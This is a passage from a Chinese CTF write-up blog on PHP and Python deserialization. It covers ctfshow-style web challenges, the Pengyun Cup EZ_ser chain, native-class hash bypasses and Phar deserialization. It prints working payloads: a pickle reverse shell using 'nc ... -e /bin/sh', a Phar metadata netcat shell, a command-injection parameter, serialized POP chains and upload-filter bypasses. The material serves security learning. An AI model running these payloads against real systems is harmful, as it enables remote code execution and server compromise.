if(preg_match('\/php|\\.\\.\/i', $this-&gt;filename)){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;evilfile=true;<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  if(preg_match('\/flag\/i', $this-&gt;filecontent)){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;evilfile=true;<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;evilfile;<br> &nbsp;  }<br> &nbsp;  public function __destruct(){<br> &nbsp; &nbsp; &nbsp;  if($this-&gt;evilfile){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  system('rm '.$this-&gt;filename);<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>if(isset($_GET['fn'])){<br> &nbsp;  $content = file_get_contents('php:\/\/input');<br> &nbsp;  $f = new filter($_GET['fn'],$content);<br> &nbsp;  if($f-&gt;checkevil()===false){<br> &nbsp; &nbsp; &nbsp;  file_put_contents($_GET['fn'], $content);<br> &nbsp; &nbsp; &nbsp;  copy($_GET['fn'],md5(mt_rand()).'.txt');<br> &nbsp; &nbsp; &nbsp;  unlink($_SERVER['DOCUMENT_ROOT'].'\/'.$_GET['fn']);<br> &nbsp; &nbsp; &nbsp;  echo 'work done';<br> &nbsp;  }<br> &nbsp; &nbsp;<br>}else{<br> &nbsp;  echo 'where is flag?';<br>}<br>\u200b<br>where is flag?<br>\u8fd9\u4e2a\u6ca1\u6709\u770b\u61c2\uff0csystem('rm '.$this-&gt;filename);\u76f4\u63a5\u5728\u8fd9\u91cc\u4f20\u5c31\u884c<br>fn=php;tac flag.php<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web277-web278<\/h3>\n\n\n\n<p>\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u53d1\u73b0<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\/backdoor?data= m=base64.b64decode(data) m=pickle.loads(m)<\/pre>\n\n\n\n<p>\u662fpickle\uff0c\u770b\u4e86\u770b\u53d1\u73b0\u662fpickle\u53cd\u5e8f\u5217\u5316\uff0c\u7136\u540e\u7b80\u5355\u5b66\u4e86\u5b66\uff0c\u5148\u4e0d\u8bb2\u4e86\uff0c\u76f4\u63a5\u4e0apayload\uff0c\u6b63\u597d\u6700\u8fd1\u4e5f\u662f\u5f04\u4e0a\u4e86\u53cd\u5f39shell,\u5f04\u4e0a\u53bb<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">import pickle<br>import base64<br>\u200b<br>class cmd():<br> &nbsp;  def __reduce__(self):<br> &nbsp; &nbsp; &nbsp;  return (eval,(\"__import__('os').popen('nc xxx.xxx.xxx.xxx xxxx -e \/bin\/sh').read()\",))<br>c = cmd()<br>a = pickle.dumps(c)<br>print(base64.b64encode(a))\/\/x\u662f\u5173\u4e8e\u4f60\u670d\u52a1\u5668\u7684\u4e1c\u897fip\u548c\u7aef\u53e3<br>\u7136\u540e\u76f4\u63a5\u53cd\u5f39shell\uff0c\u5728finalshell\u5de5\u5177\u4e0a\u9762\u8fdb\u884cRCE\uff0cls + cat 'ls'\u76f4\u63a5\u51fa\u6765<\/pre>\n\n\n\n<p>278\u548c\u8fd9\u4e2apayload\u4e00\u6837\uff0c\u4ed6\u662f\u76f4\u63a5\u8fc7\u6ee4os.system\u7684\uff0c\u5173\u6211nc\u4ec0\u4e48\u4e8b\u60c5<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u539f\u751f\u7c7b<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Error<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">hash<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>error_reporting(0);<br>class SYCLOVER {<br> &nbsp;  public $syc;<br> &nbsp;  public $lover;<br> &nbsp;  public function __wakeup(){<br> &nbsp; &nbsp; &nbsp;  if( ($this-&gt;syc != $this-&gt;lover) &amp;&amp; (md5($this-&gt;syc) === md5($this-&gt;lover)) &amp;&amp; (sha1($this-&gt;syc)=== sha1($this-&gt;lover)) ){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if(!preg_match(\"\/\\&lt;\\?php|\\(|\\)|\\\"|\\'\/\", $this-&gt;syc, $match)){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; eval($this-&gt;syc);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; } else {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; die(\"Try Hard !!\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br>\u200b<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>if (isset($_GET['great'])){<br> &nbsp;  unserialize($_GET['great']);<br>} else {<br> &nbsp;  highlight_file(__FILE__);<br>}<br>\u2022<\/pre>\n\n\n\n<p>\u9700\u8981\u7ed5\u8fc7\u4e24\u4e2ahash\u5f3a\u6bd4\u8f83\uff0c\u4e14\u6700\u7ec8\u9700\u8981\u6784\u9020eval\u4ee3\u7801\u6267\u884c<\/p>\n\n\n\n<p>\u663e\u7136\u6b63\u5e38\u65b9\u6cd5\u662f\u884c\u4e0d\u901a\u7684\uff0c\u800c\u901a\u8fc7\u539f\u751f\u7c7b\u53ef\u8fdb\u884c\u7ed5\u8fc7<\/p>\n\n\n\n<p>\u540c\u6837\uff0c\u5f53md5()\u548csha1()\u51fd\u6570\u5904\u7406\u5bf9\u8c61\u65f6\uff0c\u4f1a\u81ea\u52a8\u8c03\u7528__tostring\u65b9\u6cd5<\/p>\n\n\n\n<p>\u5148\u7b80\u5355\u770b\u4e00\u4e0b\u5176\u8f93\u51fa<\/p>\n\n\n\n<p>Error: payload in D:\\phpstudy_pro\\WWW\\csysl_hash.php:2 Stack trace: #0 {main} Error: payload in D:\\phpstudy_pro\\WWW\\csysl_hash.php:2 Stack trace: #0 {main} Exception: payload in D:\\phpstudy_pro\\WWW\\csysl_hash.php:3 Stack trace: #0 {main} Exception: payload in D:\\phpstudy_pro\\WWW\\csysl_hash.php:3 Stack trace: #0 {main}<\/p>\n\n\n\n<p>\u53ef\u4ee5\u53d1\u73b0\uff0c\u8fd9\u4e24\u4e2a\u539f\u751f\u7c7b\u8fd4\u56de\u7684\u4fe1\u606f\u9664\u4e86\u884c\u53f7\u4e00\u6a21\u4e00\u6837\uff0c\u5229\u7528\u8fd9\u70b9\uff0c\u6211\u4eec\u53ef\u4ee5\u5c1d\u8bd5\u8fdb\u884chash\u51fd\u6570\u7684\u7ed5\u8fc7\uff0c\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0c\u5fc5\u987b\u5c06\u4e24\u4e2a\u4f20\u5165\u7684\u5bf9\u8c61\u653e\u5230\u540c\u4e00\u884c<\/p>\n\n\n\n<p>\u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u8fdb\u884c\u7b80\u5355\u7684\u6d4b\u8bd5,\u53d1\u73b0\u4f7f\u7528\u6b64\u65b9\u6cd5\u53ef\u4ee5\u7ed5\u8fc7hash\u5f3a(\u5f31)\u51fd\u6570\u6bd4\u8f83<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>$a = new Error(\"payload\",1);$b = new Error(\"payload\",2);<br>if ($a!=$b){<br> &nbsp;  echo '$a\u4e0d\u7b49\u4e8e$b'.\"\\n\";<br>}<br>if (md5($a)===md5($b)){<br> &nbsp;  echo \"md5\u503c\u76f8\u7b49\\n\";<br>}<br>if (sha1($a)===sha1($b)){<br> &nbsp;  echo \"sha1\u503c\u76f8\u7b49\";<br>}<br>\/\/$a\u4e0d\u7b49\u4e8e$b md5\u503c\u76f8\u7b49 sha1\u503c\u76f8\u7b49<\/pre>\n\n\n\n<p>\u53d1\u73b0\u7ed5\u8fc7\u4e86\uff0c\u90a3\u4e48\u597d\uff0c\u5c31\u77e5\u9053\u63a5\u4e0b\u6765\u8981\u5e72\u4ec0\u4e48\u4e86<\/p>\n\n\n\n<p>\u7531\u4e8e\u8fdb\u884c\u8fc7\u6ee4\u4e86,\u5728\u8fd9\u91cc\u4f7f\u7528\u6587\u4ef6\u5305\u542b\u6765\u505a\uff0c\u6267\u884c&lt;?=include &#8216;flag.txt&#8217;?&gt;(\u672c\u5730\u6d4b\u8bd5) \u8fd9\u4e2a\u547d\u4ee4<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>class SYCLOVER {<br> &nbsp;  public $syc;<br> &nbsp;  public $lover;<br>}<br>$str = \"?&gt;&lt;?=include~\".urldecode(\"%99%93%9E%98%D1%8B%87%8B\").\"?&gt;\";<br>$a=new Error($str,1);$b=new Error($str,2);<br>$c = new SYCLOVER();<br>$c-&gt;syc = $a;<br>$c-&gt;lover = $b;<br>echo(urlencode(serialize($c)));<br>\u200b<br>?&gt;\/\/O%3A8%3A%22SYCLOVER%22%3A2%3A%7Bs%3A3%3A%22syc%22%3BO%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A23%3A%22%3F%3E%3C%3F%3Dinclude%7E%99%93%9E%98%D1%8B%87%8B%3F%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A1%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A34%3A%22D%3A%5Cphpstudy_pro%5CWWW%5Ccsysl_hash.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A7%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7Ds%3A5%3A%22lover%22%3BO%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A23%3A%22%3F%3E%3C%3F%3Dinclude%7E%99%93%9E%98%D1%8B%87%8B%3F%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A2%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A34%3A%22D%3A%5Cphpstudy_pro%5CWWW%5Ccsysl_hash.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A7%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7D%7D<\/pre>\n\n\n\n<p><strong>Warning<\/strong>: Use of undefined constant \ufffd\ufffd\ufffd\ufffd\u044b\ufffd\ufffd &#8211; assumed &#8216;\ufffd\ufffd\ufffd\ufffd\u044b\ufffd\ufffd&#8217; (this will throw an Error in a future version of PHP) in <strong>D:\\phpstudy_pro\\WWW\\ysl_hash.php(8) : eval()&#8217;d code<\/strong> on line <strong>1<\/strong> flag{is_123}1 in D:\\phpstudy_pro\\WWW\\csysl_hash.php:7 Stack trace: #0 {main} \u51fa\u6765flag\u5566<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u9e4f\u4e91\u676f\u2014\u2014EZ_ser<\/h3>\n\n\n\n<p>\u7a0d\u5fae\u9b54\u6539\u4e86\u4e00\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>\u200b<br>class DataBaseCon{<br> &nbsp;  public $user;<br> &nbsp;  public $hello;<br> &nbsp;  public function __invoke()<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;  ($this-&gt;user)-&gt;lover($this-&gt;hello);<br> &nbsp;  }<br>\u200b<br>}<br>\u200b<br>class FileHandle{<br> &nbsp;  public $lover;<br> &nbsp;  public function __toString()<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;  $func=$this-&gt;lover;<br> &nbsp; &nbsp; &nbsp;  $func();<br> &nbsp; &nbsp; &nbsp;  return \"\";<br> &nbsp;  }<br>}<br>\u200b<br>class WafWaf{<br> &nbsp;  public $a;<br> &nbsp;  public $b;<br> &nbsp;  public $c;<br> &nbsp;  public $d;<br> &nbsp;  public function __call($func,$args)<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;  if(!preg_match(\"\/exec|system|shell_exec|popens|popen|curl_exec|curl_multi_exec|proc_open|proc_POST_status|readfile|unlink|dl|memory_POST_usage|passthru|pcntl_exec|mail|imap_open|imap_mail|putenv|ini_set|apache_setenv|symlink|linkopen_basedir|eval|assert|create_function|array_map|call_user_func_array|array_filter|uasort|preg_replace\/i\", $this-&gt;b)){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $a=new $args[0]($this-&gt;b);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $c=$this-&gt;c;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $a-&gt;$c($this-&gt;d);<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  else {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  die(\"waf\");<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>\u200b<br>class WebInfo{<br> &nbsp;  public $web;<br> &nbsp;  public $syc;<br> &nbsp;  public $lover;<br> &nbsp;  public function  __wakeup()<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;  if( ($this-&gt;syc != $this-&gt;lover) &amp;&amp; (md5($this-&gt;syc) === md5($this-&gt;lover)) &amp;&amp; (sha1($this-&gt;syc)=== sha1($this-&gt;lover)) )<br> &nbsp; &nbsp; &nbsp;  {<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  eval($this-&gt;syc);<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>if (isset($_GET['pop'])){<br> &nbsp;  unserialize($_GET['pop']);<br>} else {<br> &nbsp;  highlight_file(__FILE__);<br>}<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>\u200b<br>class DataBaseCon { public $user; public $hello; }<br>class FileHandle  { public $lover; }<br>class WafWaf &nbsp; &nbsp;  { public $a; public $b; public $c; public $d; }<br>class WebInfo &nbsp; &nbsp; { public $web; public $syc; public $lover; }<br>\u200b<br>$waf = new WafWaf();<br>$waf-&gt;b = \"highlight_file\";<br>$waf-&gt;c = \"invoke\";<br>$waf-&gt;d = \"flag\";<br>\u200b<br>$db = new DataBaseCon();<br>$db-&gt;user  = $waf;<br>$db-&gt;hello = \"ReflectionFunction\"; \/\/ \u53cd\u5c04\u51fd\u6570\u7c7b<br>\u200b<br>$file = new FileHandle();<br>$file-&gt;lover = $db;<br>\u200b<br>$web = new WebInfo();<br>$web-&gt;web &nbsp; = $file;<br>$web-&gt;syc &nbsp; = [0,2];<br>$web-&gt;lover = [0,1];<br>\u200b<br>echo serialize($web);<\/pre>\n\n\n\n<p><strong>Warning<\/strong>: Use of undefined constant \ufffd\ufffd\ufffd\ufffd\u044b\ufffd\ufffd &#8211; assumed &#8216;\ufffd\ufffd\ufffd\ufffd\u044b\ufffd\ufffd&#8217; (this will throw an Error in a future version of PHP) in <strong>D:\\phpstudy_pro\\WWW\\pyb_ser.php(51) : eval()&#8217;d code<\/strong> on line <strong>1<\/strong> flag{is_123}1 in D:\\phpstrom-php\\php\u4ee3\u7801\\error.php:48 Stack trace: #0 {main}<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">waf\u7ed5\u8fc7<\/h2>\n\n\n\n<h2 class=\"wp-block-heading\">phar\u53cd\u5e8f\u5217\u5316<\/h2>\n\n\n\n<p>Phar \u662f PHP \u7684\u538b\u7f29\u6587\u6863\uff0c\u662f PHP \u4e2d\u7c7b\u4f3c\u4e8e JAR \u7684\u4e00\u79cd\u6253\u5305\u6587\u4ef6\uff0c\u4ed6\u53ef\u4ee5\u628a\u591a\u4e2a\u6587\u4ef6\u5b58\u653e\u5230\u540c\u4e00\u4e2a\u6587\u4ef6\u4e2d\uff0c\u65e0\u9700\u89e3\u538b\uff0cPHP \u5c31\u53ef\u4ee5\u8fdb\u884c\u8bbf\u95ee\u5e76\u6267\u884c\u5185\u90e8\u8bed\u53e5<\/p>\n\n\n\n<p>\u8981\u6c42\u662fphp\u7248\u672c\u5927\u4e8e5.3<\/p>\n\n\n\n<p>\u5206\u522b\u5206\u4e3a\u56db\u4e2a\u90e8\u5206<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">1\u3001Stub &nbsp; &nbsp;  \/\/Phar\u6587\u4ef6\u5934<br>2\u3001manifest  \/\/\u538b\u7f29\u6587\u4ef6\u4fe1\u606f<br>3\u3001contents  \/\/\u538b\u7f29\u6587\u4ef6\u5185\u5bb9<br>4\u3001signature \/\/\u7b7e\u540d<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Sutb<\/h3>\n\n\n\n<p>\u5176\u4e2d Stub \u662f Phar \u7684\u6587\u4ef6\u6807\u8bc6\uff0c\u4e5f\u53ef\u4ee5\u7406\u89e3\u4e3a\u5b83\u5c31\u662f Phar \u7684\u6587\u4ef6\u5934 Stub \u5176\u5b9e\u5c31\u662f\u4e00\u4e2a\u7b80\u5355\u7684 PHP \u6587\u4ef6\uff0c\u5bf9\u683c\u5f0f\u6709\u8981\u6c42\u7684<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">xxx&lt;?php xxx; __HALT_COMPILER();?&gt; \/\/\u5728\u524d\u9762\u7684\u5185\u5bb9\u662f\u6ca1\u6709\u9650\u5236\u7684\u4f46\u5fc5\u987b\u4ee5__HALT_COMPILER();\u6765\u7ed3\u5c3e\uff0c\u5426\u5219phar\u6269\u5c55\u5c06\u65e0\u6cd5\u8bc6\u522b\u8fd9\u4e2a\u6587\u4ef6\u4e3aphar\u6587\u4ef6<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">manifest<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">\u7528\u4e8e\u5b58\u653e\u6587\u4ef6\u7684\u5c5e\u6027\uff0c\u6743\u9650\u7b49\u4fe1\u606f<br>\u8fd9\u91cc\u4e5f\u662f\u53cd\u5e8f\u5217\u5316\u7684\u653b\u51fb\u70b9\uff0c\u56e0\u4e3a\u8fd9\u91cc\u4ee5\u53cd\u5e8f\u5217\u5316\u7684\u5f62\u5f0f\u5b58\u50a8\u4e86\u7528\u6237\u81ea\u5b9a\u4e49\u7684 meta-data<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">contents<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">\u7528\u4e8e\u5b58\u653e Phar \u6587\u4ef6\u7684\u5185\u5bb9<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">signature<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">\u7b7e\u540d\uff08\u53ef\u9009\u53c2\u6570\uff09\uff0c\u4f4d\u4e8e\u6587\u4ef6\u672b\u5c3e\uff0c\u5177\u4f53\u683c\u5f0f<\/pre>\n\n\n\n<p>\u800c\u5728\u5b98\u65b9\u6587\u6863\u4e2d\u770b\u51fa\uff0c\u7b7e\u8bc1\u5c3e\u90e8\u7684 <code>01<\/code> \u4ee3\u8868 md5 \u52a0\u5bc6\uff0c<code>02<\/code> \u4ee3\u8868 sha1 \u52a0\u5bc6\uff0c<code>04<\/code> \u4ee3\u8868 sha256 \u52a0\u5bc6\uff0c<code>08<\/code> \u4ee3\u8868 sha512 \u52a0\u5bc6<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u5229\u7528<\/h3>\n\n\n\n<p>\u56e0\u4e3a Phar \u6587\u4ef6\u4f1a\u4ee5\u5e8f\u5217\u5316\u7684\u5f62\u5f0f\u5b58\u50a8\u7528\u6237\u81ea\u5b9a\u4e49\u7684 <code>meta-data<\/code>\uff0cPHP \u4f7f\u7528 <code>phar_parse_metadata<\/code> \u5728\u89e3\u6790 meta \u6570\u636e\u65f6\uff0c\u4f1a\u8c03\u7528 <code>php_var_unserialize<\/code> \u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">Phar\u53cd\u5e8f\u5217\u5316\u4e0d\u4f1a\u8c03\u7528 `weakup `\u7b49\u65b9\u6cd5<br>\u53ef\u4ee5\u5728\u4e0d\u8c03\u7528`unserialize()`\u7684\u60c5\u51b5\u4e0b\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c\u3002<\/pre>\n\n\n\n<p>php\u4e00\u5927\u90e8\u5206\u7684\u6587\u4ef6\u7cfb\u7edf\u51fd\u6570\u5728\u901a\u8fc7<code>phar:\/\/<\/code>\u4f2a\u534f\u8bae\u89e3\u6790phar\u6587\u4ef6\u65f6\uff0c\u90fd\u4f1a\u5c06meta-data\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\uff0c\u57fa\u672c\u4e0a\u80fd\u4f7f\u7528\u4f2a\u534f\u8bae\u7684\u6587\u4ef6\u64cd\u4f5c\u51fd\u6570\u90fd\u80fd\u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/sun1028.top\/wp-content\/uploads\/2025\/03\/image-20250319171329613-1024x310.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/sun1028.top\/wp-content\/uploads\/2025\/03\/image-20250319171329613-1024x310.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u5229\u7528\u6761\u4ef6\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">1. phar\u6587\u4ef6\u8981\u80fd\u591f\u4e0a\u4f20\u5230\u670d\u52a1\u5668\u7aef\u3002<br>2. \u8981\u6709\u53ef\u7528\u7684\u9b54\u672f\u65b9\u6cd5\u4f5c\u4e3a\u201c\u8df3\u677f\u201d\u3002<br>3. \u6587\u4ef6\u64cd\u4f5c\u51fd\u6570\u7684\u53c2\u6570\u53ef\u63a7\uff0c\u4e14`:`\u3001`\/`\u3001`phar`\u7b49\u7279\u6b8a\u5b57\u7b26\u6ca1\u6709\u88ab\u8fc7\u6ee4<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">\u4e3e\u4e2a\u6817\u5b50<br>&lt;?php<br> &nbsp;  class TestObject {<br> &nbsp; &nbsp;<br> &nbsp;  }<br> &nbsp; &nbsp;<br> &nbsp;  $phar = new Phar(\"phar.phar\"); \/\/\u540e\u7f00\u540d\u5fc5\u987b\u4e3aphar<br> &nbsp;  $phar-&gt;startBuffering();\/\/\u5f00\u542f\u7f13\u51b2\u533a<br> &nbsp;  $phar-&gt;setStub(\"&lt;?php __HALT_COMPILER(); ?&gt;\"); \/\/\u8bbe\u7f6estub<br> &nbsp; &nbsp;<br> &nbsp;  \/*\u53ef\u9009*\/<br> &nbsp;  $o = new TestObject();<br> &nbsp;  $o -&gt; data='busybox nc 111.111.111.111 4444 -e \/bin\/sh';<br> &nbsp;  $phar-&gt;setMetadata($o); \/\/\u5c06\u81ea\u5b9a\u4e49\u7684meta-data\u5b58\u5165manifest<br> &nbsp; &nbsp;<br> &nbsp;  $phar-&gt;addFromString(\"test.txt\", \"test\"); \/\/\u6dfb\u52a0\u8981\u538b\u7f29\u7684\u6587\u4ef6<br> &nbsp;  \/\/\u7b7e\u540d\u81ea\u52a8\u8ba1\u7b97<br> &nbsp;  $phar-&gt;stopBuffering();\/\/\u5173\u95ed\u7f13\u51b2\u533a<br>?&gt;<\/pre>\n\n\n\n<p>\u6bd4\u8f83\u91cd\u8981\u7684\u662f\uff0c\u8bb0\u5f97\u66f4\u6539\u81ea\u5df1\u7684 <code>php.ini<\/code> \u5c06 phar.readonly \u90a3\u4e00\u884c\u8bbe\u7f6e\u4e3a Off\uff0c\u5c06\u524d\u9762\u7684\u5206\u53f7\u53bb\u6389\uff0c\u5206\u53f7\u5728\u8fd9\u91cc\u8d77\u7740\u6ce8\u91ca\u7b26\u7684\u4f5c\u7528<\/p>\n\n\n\n<p>\u6ce8\uff1a\u6587\u4ef6\u4e0a\u4f20\u65f6\uff0c\u4e0d\u5fc5\u8981.phar \u540e\u7f00\uff0c\u6587\u4ef6\u4e0a\u4f20\u4e0d\u662f\u96be\u70b9\uff01\uff01\uff08phar \u4f2a\u534f\u8bae\u81ea\u52a8\u89e3\u6790\u6210.phar \u6587\u4ef6\uff09<\/p>\n\n\n\n<p>\u800c\u5229\u7528\u8be5\u53cd\u5e8f\u5217\u5316\u7684\u7684\u7b2c\u4e00\u6b65\u5c31\u662f\u4e0a\u4f20phar\u6587\u4ef6<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u7ed5\u8fc7<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u683c\u5f0f<\/h4>\n\n\n\n<p>\u5229\u7528 Phar \u53cd\u5e8f\u5217\u5316\u7684\u7b2c\u4e00\u6b65\u5c31\u662f\u9700\u8981\u5c06 Phar \u6587\u4ef6\u4e0a\u4f20\u5230\u670d\u52a1\u5668\uff0c\u82e5\u670d\u52a1\u5668\u5b58\u5728\u9632\u62a4\uff0c\u90a3\u5c31\u9700\u8981\u66f4\u6539\u6587\u4ef6\u683c\u5f0f<\/p>\n\n\n\n<p>\u6bd4\u5982\u53ea\u53ef\u4ee5\u4e0a\u4f20gif\u6587\u4ef6<\/p>\n\n\n\n<p>PHP \u901a\u8fc7 <code>Stub<\/code> \u91cc\u7684<code>__HALT_COMPILER();<\/code> \u6765\u8bc6\u522b\u8fd9\u4e2a\u6587\u4ef6\u662f Phar \u6587\u4ef6\uff0c\u5bf9\u4e8e\u5176\u4ed6\u65e0\u9650\u5236\u3002<\/p>\n\n\n\n<p>\u6545 \u5bf9\u6587\u4ef6\u540e\u7f00\u3001\u6587\u4ef6\u540d\u8fdb\u884c\u66f4\u6539\uff0c\u5176\u5b9e\u8d28\u4ecd\u7136\u662f Phar \u6587\u4ef6\uff0c\u6240\u4ee5\u4e0d\u7528\u62c5\u5fc3\u6587\u4ef6\u540e\u7f00\u7684\u95ee\u9898<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u7ed5\u8fc7phar<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">if (preg_match(\"\/^php|^file|^phar|^dict|^zip\/i\",$filename){<br> &nbsp;  die();<br>}<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">\u901a\u8fc7\u534f\u8bae\u7ed5\u8fc7<br>1\u3001\u4f7f\u7528filter\u4f2a\u534f\u8bae\u6765\u8fdb\u884c\u7ed5\u8fc7<br>php:\/\/filter\/read=convert.base64-encode\/resource=phar:\/\/test.phar<br> <br>2\u3001\u4f7f\u7528bzip2\u534f\u8bae\u6765\u8fdb\u884c\u7ed5\u8fc7<br>compress.bzip2:\/\/phar:\/\/\/test.phar\/test.txt<br> <br>3\u3001\u4f7f\u7528zlib\u534f\u8bae\u8fdb\u884c\u7ed5\u8fc7<br>compress.zlib:\/\/phar:\/\/\/home\/sx\/test.phar\/test.txt<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u7ed5\u8fc7<code>__HALT_COMPILER\u68c0\u6d4b<\/code><\/h3>\n\n\n\n<p>\u53ef\u4ee5\u901a\u8fc7\u524d\u9762\u52a0\u4e0a\u56fe\u7247\u5934\u7ed5\u8fc7<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">$phar-&gt;setStub(\"GIF89a&lt;?php __HALT_COMPILER();?&gt;\");<\/pre>\n\n\n\n<p>\u4e5f\u53ef\u5c06 Phar \u6587\u4ef6\u7684\u5185\u5bb9\u5199\u5230\u538b\u7f29\u5305\u7684\u6ce8\u91ca\u4e2d\uff0c\u538b\u7f29\u4e3a zip \u6587\u4ef6<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>$a = serialize($a);<br>$zip = new ZipArchive();<br>$res = $zip-&gt;open('phar.zip',ZipArchive::CREATE); <br>$zip-&gt;addFromString('flag.txt', 'flag is here');<br>$zip-&gt;setArchiveComment($a);<br>$zip-&gt;close(); &nbsp; &nbsp;<br>?&gt;<\/pre>\n\n\n\n<p>\u6216\u8005\u662f\u5c06\u751f\u6210\u7684 Phar \u6587\u4ef6\u8fdb\u884c gzip \u538b\u7f29\uff0c\u538b\u7f29\u547d\u4ee4<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">gzip test.phar<br>\/\/gzip \u6587\u4ef6\u540d.phar<br>\u538b\u7f29\u540e\u540c\u6837\u4e5f\u53ef\u4ee5\u8fdb\u884c\u53cd\u5e8f\u5217\u5316<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u6f0f\u6d1e\u5229\u7528\uff1a \u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff08Deserialization Vulnerability\uff09\u662f\u4e00\u79cd\u5b89\u5168\u6f0f\u6d1e\uff0c\u5b58\u5728\u4e8e\u5e94 